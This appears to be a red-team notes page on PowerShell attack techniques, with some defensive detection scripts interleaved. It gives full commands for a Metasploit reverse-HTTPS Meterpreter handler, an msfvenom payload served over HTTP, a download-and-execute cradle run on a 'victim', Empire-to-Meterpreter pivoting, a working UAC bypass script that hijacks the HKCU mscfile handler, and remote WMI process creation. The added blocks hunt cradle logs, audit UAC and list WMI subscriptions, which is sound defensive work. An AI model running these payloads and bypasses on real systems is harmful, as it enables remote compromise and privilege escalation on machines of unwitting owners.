Misc Powershell Playground

Powershell with Metasploit + psh payload + Meterpreter

Step 1: Multi Handler in Metasploit

On Kali:

# msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_https
set LHOST x.x.x.x
set LPORT 443
exploit -j

Step 2: Generate PS Script payload using Msfvenom

On Kali:

msfvenom -p windows/x64/meterpreter_reverse_https LHOST=x.x.x.x LPORT=443 -f psh-reflection > payload.ps1

Step 3: Serve the payload

On Kali:

python -m SimpleHTTPServer 80

(This is the Python 2 module; with Python 3 use python3 -m http.server 80.)

Step 4: Download and Run on victim

powershell iex (New-Object Net.WebClient).DownloadString("http://x.x.x.x/payload.ps1")

Now the handler should receive a reverse shell.

Note that in Meterpreter, load powershell gives us a PowerShell session, lets us execute PowerShell commands, and lets us import PowerShell scripts.
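From the defender's side, the download cradle in Step 4 (iex + Net.WebClient.DownloadString) is exactly what PowerShell Script Block Logging records as Event ID 4104. The following is an added example, not part of the original notes, that hunts back through those events for that pattern. It assumes Script Block Logging is enabled on the host; the regex list and the "two indicators" threshold are assumptions to tune per environment.

```powershell
# Added example (not from the original notes): hunt Event ID 4104 for the
# download-and-execute cradle pattern. Assumes Script Block Logging is enabled.
function Find-DownloadCradle {
    param([int]$MaxEvents = 5000)

    # Assumed indicator list; each is a regex matched against the logged script text
    $patterns = @(
        'DownloadString\s*\(',          # WebClient.DownloadString(...)
        'Net\.WebClient',               # New-Object Net.WebClient
        '\b(iex|Invoke-Expression)\b'   # in-memory execution of the fetched text
    )

    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
      ForEach-Object {
        # 4104 properties: MessageNumber, MessageTotal, ScriptBlockText, ScriptBlockId, Path
        $text = [string]$_.Properties[2].Value
        $hits = @($patterns | Where-Object { $text -match $_ })
        if ($hits.Count -ge 2) {      # require two indicators to cut down noise
            [pscustomobject]@{
                Time    = $_.TimeCreated
                Matched = ($hits -join ', ')
                Snippet = $text.Substring(0, [Math]::Min(200, $text.Length))
            }
        }
      }
}

Find-DownloadCradle | Format-Table -AutoSize -Wrap
```

Run it in an elevated PowerShell on the host being examined; the cradle from Step 4 matches all three indicators, while ordinary administrative scripts rarely match more than one.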

Empire Agent shell to Metasploit Meterpreter

Assume we now have an active agent in Empire.

Step 1: Metasploit multi script

use multi/script/web_delivery
set payload windows/x64/meterpreter/reverse_https
set SRVHOST <attacker_ip>
set LHOST <attacker_ip>
set target 2
exploit 

Then a command will appear, as well as the payload location.

Step 2:

On Empire:

usemodule powershell/code_execution/invoke_metasploitpayload
set URL http://x.x.x.x:8080/xxxxxxxx
set Agent <agent ID>
execute

Now on Metasploit, a new session should spawn!

UAC Bypass

To view UAC settings on Powershell:

 Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name EnableLUA

To bypass UAC, you must at least satisfy all of the following:

  1. Local Admin

  2. Current UAC setting is Default

In fact, it depends on the integrity level of the program:

  • A medium-integrity process cannot perform admin work without passing UAC.

Some processes are built to run at high integrity without a prompt!

msconfig.exe

msconfig.exe runs at High Integrity by default and does not need to pass UAC, because this is set in its manifest when it is compiled.

To check, inspect the binary with pestudio:

Note <autoElevate>true</autoElevate>

But this process cannot help us bypass UAC. Instead, use Computer Management!

compmgmtlauncher.exe (mmc.exe)

When you launch compmgmtlauncher.exe, you will eventually see this pair:

  • Parent Process: mmc.exe

  • Process: compmgmt.msc

In fact, the mmc.exe command line is:

"C:\Windows\system32\mmc.exe" "C:\Windows\system32\compmgmt.msc" /s

In the middle of the launch process, compmgmtlauncher.exe opens the registry key HKCU\Software\Classes\mscfile\shell\open\command, which the current user can modify! This can be leveraged to bypass UAC!

If you go to HKEY_CURRENT_USER\Software\Classes\, you will see there is no mscfile key. Create it to match that behavior:

HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command, and set the default value of command to the program you want!
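Two things a defender wants to check on a host given the UAC settings above and the mscfile handler described here: what the actual UAC posture is, and whether anyone has planted an HKCU mscfile handler (it does not exist on a clean profile). The following is an added example, not part of the original notes; the value-to-level mapping follows the documented meanings of ConsentPromptBehaviorAdmin (5 = default, 2 = Always Notify) and PromptOnSecureDesktop.

```powershell
# Added example (not from the original notes): audit UAC posture and check for
# a user-planted mscfile handler under HKCU.

function Get-UacPosture {
    $sys = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $level = if ($sys.EnableLUA -eq 0) {
                 'UAC disabled'
             } elseif ($sys.ConsentPromptBehaviorAdmin -eq 2 -and $sys.PromptOnSecureDesktop -eq 1) {
                 'Always Notify'
             } elseif ($sys.ConsentPromptBehaviorAdmin -eq 5 -and $sys.PromptOnSecureDesktop -eq 1) {
                 'Default (notify only when apps try to make changes)'
             } else {
                 'Non-default / lowered'
             }
    [pscustomobject]@{
        EnableLUA                  = $sys.EnableLUA
        ConsentPromptBehaviorAdmin = $sys.ConsentPromptBehaviorAdmin
        PromptOnSecureDesktop      = $sys.PromptOnSecureDesktop
        Level                      = $level
    }
}

function Test-MscfileHandler {
    # HKCU:\Software\Classes\mscfile is absent by default; a shell\open\command
    # under it is the hijack indicator described in the notes above.
    $path = 'HKCU:\Software\Classes\mscfile\shell\open\command'
    if (Test-Path $path) {
        $cmd = (Get-ItemProperty -Path $path).'(default)'
        [pscustomobject]@{ Present = $true;  Command = $cmd }
    } else {
        [pscustomobject]@{ Present = $false; Command = $null }
    }
}

Get-UacPosture
Test-MscfileHandler
```

Run Test-MscfileHandler for every loaded user hive, not just the current one, when triaging a machine; the key lives in the per-user hive, so each profile must be checked separately.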

UAC_Bypass.ps1 (no longer works)

<#
  UAC Bypass via the HKCU mscfile handler read by CompMgmtLauncher.exe
#>

echo "[+] Checking UAC status ..."

$ConsentPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).ConsentPromptBehaviorAdmin
$SecureDesktopPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).PromptOnSecureDesktop

if($ConsentPrompt -Eq 2 -And $SecureDesktopPrompt -Eq 1){
  echo "[!] UAC is set to 'Always Notify', cannot bypass UAC :("
} else {
  echo "[*] UAC Status OK and set to 'Default'!"
  
  # The handler key described above: shell\open\command (not shell\open\shell)
  $MscRegPath = "HKCU:\Software\Classes\mscfile\shell\open\command"
  $ValName = "(Default)"
  $RegValue = "cmd.exe"
  
  New-Item -Path $MscRegPath -Force | Out-Null
  New-ItemProperty -Path $MscRegPath -Name $ValName -Value $RegValue | Out-Null
  
  # Start CompMgmtLauncher.exe; the mmc.exe it spawns reads the handler set above
  $CompMgmtBypass = 'wmic process call create "cmd.exe /c start /min C:\windows\system32\CompMgmtLauncher.exe"'
  $a_cmd = "C:\windows\system32\cmd.exe"
  & $a_cmd /c $CompMgmtBypass
  
  Start-Sleep -s 5
  
  # Cleanup registry modifications
  $MscRegCleanup = "HKCU:\Software\Classes\mscfile"
  Remove-Item -Path $MscRegCleanup -Force -Recurse -ErrorAction SilentlyContinue | Out-Null
}

WMI for Persistence

Get-WmiObject

Show all namespace objects:

Get-WmiObject -Namespace "root/cimv2" -Class "__Namespace"

Or, more simply:

Get-WmiObject -Namespace "root/cimv2" -Class "__Namespace" | Select-Object Name

To get all classes (overwhelming!):

Get-WmiObject -Namespace "root/cimv2" -List
Get-WmiObject -Namespace "root/cimv2" -List | ? { $_.Name -Match "Win32_service" }

For example, we see a class named Win32_Service. Let's try:

Get-WmiObject -Class Win32_Service
Get-WmiObject -Class Win32_Service | ? { $_.State -Match "Running" }

We will often query the Win32_Process class:

Get-WmiObject -Class Win32_Process -List
Get-WmiObject -List Win32_Process | Get-Member -MemberType Method

To create a process:

$proc = Get-WmiObject -List Win32_Process
$proc.Create("cmd.exe")

Invoke-WmiMethod

There is another cmdlet that does the same (the method is passed with -Name):

Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList cmd.exe

We can also perform remote WMI jobs:

Invoke-WmiMethod -Class Win32_Process -Name create -ArgumentList cmd.exe -ComputerName <ComputerName> -Credential <User>
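The section is titled "WMI for Persistence", and the artefact that kind of persistence leaves behind is a permanent event subscription in root\subscription: an __EventFilter (the trigger query), an __EventConsumer (what runs) and a __FilterToConsumerBinding tying them together. The following is an added example, not part of the original notes, that enumerates those bindings with the same Get-WmiObject cmdlet used above so a defender can review what is registered on a host.

```powershell
# Added example (not from the original notes): list permanent WMI event
# subscriptions, resolving each binding to its filter and consumer.
function Get-WmiSubscription {
    $ns = 'root\subscription'
    $filters   = @(Get-WmiObject -Namespace $ns -Class __EventFilter)
    # __EventConsumer is abstract; querying it returns every concrete consumer type
    $consumers = @(Get-WmiObject -Namespace $ns -Class __EventConsumer)
    $bindings  = @(Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding)

    foreach ($b in $bindings) {
        # Binding.Filter / .Consumer hold references such as __EventFilter.Name="X"
        $f = $filters   | Where-Object { $b.Filter   -match [regex]::Escape($_.Name) } | Select-Object -First 1
        $c = $consumers | Where-Object { $b.Consumer -match [regex]::Escape($_.Name) } | Select-Object -First 1

        # CommandLineEventConsumer carries CommandLineTemplate, ActiveScriptEventConsumer
        # carries ScriptText; other consumer types have neither, so Payload stays empty
        $payload = if ($c.CommandLineTemplate) { $c.CommandLineTemplate } else { $c.ScriptText }

        [pscustomobject]@{
            Filter       = $f.Name
            Query        = $f.Query
            Consumer     = $c.Name
            ConsumerType = $c.__CLASS
            Payload      = $payload
        }
    }
}

Get-WmiSubscription | Format-List
```

A stock Windows install shows one binding, "SCM Event Log Filter" to "SCM Event Log Consumer" (an NTEventLogEventConsumer); anything else, and in particular any CommandLineEventConsumer or ActiveScriptEventConsumer, deserves a close look at its Query and Payload.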

PowerLurk
